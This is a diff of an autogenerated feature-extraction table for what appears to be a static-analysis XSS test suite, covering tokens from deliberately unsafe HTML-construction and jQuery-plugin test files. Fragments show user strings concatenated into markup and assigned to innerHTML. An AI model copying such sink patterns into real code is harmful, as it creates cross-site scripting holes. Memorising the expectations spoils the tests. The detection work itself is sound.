+| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:17:11:18 | id | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:17:11:18 | id | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:17:11:18 | id | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:17:11:18 | id | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:17:11:18 | id | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:17:11:18 | id | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:17:11:18 | id | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:20:11:20 | s | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:20:11:20 | s | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:20:11:20 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:20:11:20 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:20:11:20 | s | enclosingFunctionBody | s s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:20:11:20 | s | enclosingFunctionBody | s s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:20:11:20 | s | enclosingFunctionName | id | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:20:11:20 | s | enclosingFunctionName | id | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:20:11:20 | s | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:20:11:20 | s | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:12:12:12:12 | s | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:12:12:12:12 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:12:12:12:12 | s | enclosingFunctionBody | s s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:12:12:12:12 | s | enclosingFunctionName | id | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:12:12:12:12 | s | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:15:7 | id | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:15:7 | id | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:15:7 | id | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:15:7 | id | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:15:7 | id | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:15:7 | this | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:15:7 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:15:7 | this | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:15:7 | this | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:15:7 | this | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:19:1 | 'arguments' object of function notVulnerable | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:19:1 | 'arguments' object of function notVulnerable | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:19:1 | 'arguments' object of function notVulnerable | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:19:1 | 'arguments' object of function notVulnerable | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:19:1 | 'arguments' object of function notVulnerable | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:19:1 | exceptional return of function notVulnerable | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:19:1 | exceptional return of function notVulnerable | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:19:1 | exceptional return of function notVulnerable | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:19:1 | exceptional return of function notVulnerable | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:19:1 | exceptional return of function notVulnerable | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:19:1 | functio ... html;\\n} | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:19:1 | functio ... html;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:19:1 | functio ... html;\\n} | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:19:1 | return of function notVulnerable | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:19:1 | return of function notVulnerable | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:19:1 | return of function notVulnerable | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:19:1 | return of function notVulnerable | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:8:19:1 | return of function notVulnerable | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:17:15:29 | notVulnerable | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:17:15:29 | notVulnerable | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:15:17:15:29 | notVulnerable | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:11:16:11 | s | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:11:16:11 | s | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:11:16:11 | s | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:11:16:11 | s | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:11:16:11 | s | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:11:16:21 | s | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:11:16:21 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:11:16:21 | s | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:11:16:21 | s | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:11:16:21 | s | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:11:16:21 | s = id("x") | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:11:16:21 | s = id("x") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:11:16:21 | s = id("x") | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:11:16:21 | s = id("x") | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:11:16:21 | s = id("x") | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:15:16:16 | id | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:15:16:16 | id | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:15:16:16 | id | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:15:16:16 | id | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:15:16:16 | id | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:15:16:21 | exceptional return of id("x") | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:15:16:21 | exceptional return of id("x") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:15:16:21 | exceptional return of id("x") | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:15:16:21 | exceptional return of id("x") | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:15:16:21 | exceptional return of id("x") | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:15:16:21 | id("x") | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:15:16:21 | id("x") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:15:16:21 | id("x") | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:15:16:21 | id("x") | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:15:16:21 | id("x") | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:18:16:20 | "x" | CalleeFlexibleAccessPath | id | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:18:16:20 | "x" | InputArgumentIndex | 0 | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:18:16:20 | "x" | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:18:16:20 | "x" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:18:16:20 | "x" | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:18:16:20 | "x" | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:16:18:16:20 | "x" | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:11:17:14 | html | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:11:17:14 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:11:17:14 | html | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:11:17:14 | html | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:11:17:14 | html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:11:17:41 | html | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:11:17:41 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:11:17:41 | html | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:11:17:41 | html | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:11:17:41 | html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:11:17:41 | html = ... /span>" | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:11:17:41 | html = ... /span>" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:11:17:41 | html = ... /span>" | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:11:17:41 | html = ... /span>" | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:11:17:41 | html = ... /span>" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:18:17:25 | "" | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:18:17:25 | "" | contextSurroundingFunctionParameters | () | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:18:17:25 | "" | enclosingFunctionBody | s id x html s document body innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:18:17:25 | "" | enclosingFunctionName | notVulnerable | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:18:17:25 | "" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:18:17:25 | "" | stringConcatenatedWith | -endpoint- s + '' | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:18:17:29 | "" + s | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:18:17:29 | "" + s | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:18:17:29 | "" + s | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:18:17:29 | "" + s | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:18:17:29 | "" + s | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:18:17:41 | " ... /span>" | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:18:17:41 | " ... /span>" | contextSurroundingFunctionParameters | () | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:18:17:41 | " ... /span>" | enclosingFunctionBody | s id x html s document body innerHTML html | @@ -23687,132 +154689,839 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:33:17:41 | "" | enclosingFunctionName | notVulnerable | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:33:17:41 | "" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:17:33:17:41 | "" | stringConcatenatedWith | '' + s -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:12 | document | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:12 | document | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:12 | document | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:12 | document | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:17 | document.body | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:17 | document.body | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:17 | document.body | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:17 | document.body | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:27 | documen ... nerHTML | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:27 | documen ... nerHTML | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:27 | documen ... nerHTML | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:27 | documen ... nerHTML | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:34 | documen ... = html | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:34 | documen ... = html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:34 | documen ... = html | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:34 | documen ... = html | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:5:18:34 | documen ... = html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:14:18:17 | body | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:14:18:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:14:18:17 | body | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:14:18:17 | body | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:14:18:17 | body | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:19:18:27 | innerHTML | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:19:18:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:19:18:27 | innerHTML | enclosingFunctionBody | s id x html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:19:18:27 | innerHTML | enclosingFunctionName | notVulnerable | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:19:18:27 | innerHTML | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:31:18:34 | html | assignedToPropName | innerHTML | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:31:18:34 | html | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:31:18:34 | html | contextSurroundingFunctionParameters | () | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:31:18:34 | html | enclosingFunctionBody | s id x html s document body innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:31:18:34 | html | enclosingFunctionName | notVulnerable | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:18:31:18:34 | html | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:1:1:0 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:1:195:2 | (functi ... \\n\\t};\\n}) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:1:195:2 | (functi ... \\n\\t};\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:1:195:2 | (functi ... \\n\\t};\\n}) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:1:1 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:1:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:1:1 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:1:1 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:195:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:195:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:195:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:195:1 | 'arguments' object of anonymous function | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:195:1 | exceptional return of anonymous function | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:195:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:195:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:195:1 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:195:1 | functio ... ;\\n\\t};\\n} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:195:1 | functio ... ;\\n\\t};\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:195:1 | functio ... ;\\n\\t};\\n} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:195:1 | return of anonymous function | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:195:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:195:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:1:2:195:1 | return of anonymous function | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:2:2:2 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:2:2:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:2:2:2 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:2:2:2 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:2:2:5 | $.fn | contextFunctionInterfaces | 